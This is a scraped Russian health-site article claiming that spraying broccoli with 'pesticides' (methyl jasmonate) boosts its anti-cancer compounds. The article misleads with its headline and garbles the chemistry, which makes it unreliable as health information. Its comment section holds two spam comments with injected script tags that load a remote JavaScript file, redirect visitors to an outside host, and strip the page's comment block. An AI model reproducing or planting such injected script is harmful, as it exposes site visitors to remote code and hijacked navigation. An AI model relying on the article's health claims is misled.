Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пестициды для брокколи ум...  >>  Пестициды для брокколи уменьшают риск рака
 
Обратная связь
 

Пестициды для брокколи уменьшают риск рака

Размер шрифта
06 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

Брокколи – один из самых полезных овощей на Земле. Давно известны противоопухолевые свойства брокколи. Но, оказывается, распыляя на брокколи пестициды, мы усиливаем ее противораковую активность!

Пестициды для брокколи уменьшают риск рака

Правильное питание является основной составляющей в борьбе с онкологическими заболеваниями. Самым мощным семейством растений, по мнению ученых, которое способно содействовать борьбе с раком, является семейство крестоцветных. К этому семейству относятся брокколи, белокочанная и брюссельская капуста.

Регулярное употребление в пищу брокколи связано со снижением риска рака простаты, толстой кишки, молочной железы, легких и рака кожи. В брокколи содержатся глюкозинолаты, при распаде которых образуются ферменты, помогающие нам избавиться от канцерогенов.

Одним из способов увеличения содержания глюкозинолатов является распыление на брокколи пестицидов, в частности – так называемых метилжасмонатов – растительных гормонов, которые регулируют рост и развитие растений, защищают растения от вредителей.

Ученые протестировали 5 коммерческих видов брокколи, распыляя на них пестициды. В итоге выяснилось, что основным веществом, образующимся при распаде глюкозинолатов, является сульфорафан. Именно сульфорафан повышает количеств противораковых ферментов в организме.

Эта информация может послужить стимулом к разведению улучшенных сортов брокколи, специально созданных для борьбы с раком.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как выпить и защитить печень   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Еда против рака. Часть 2
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.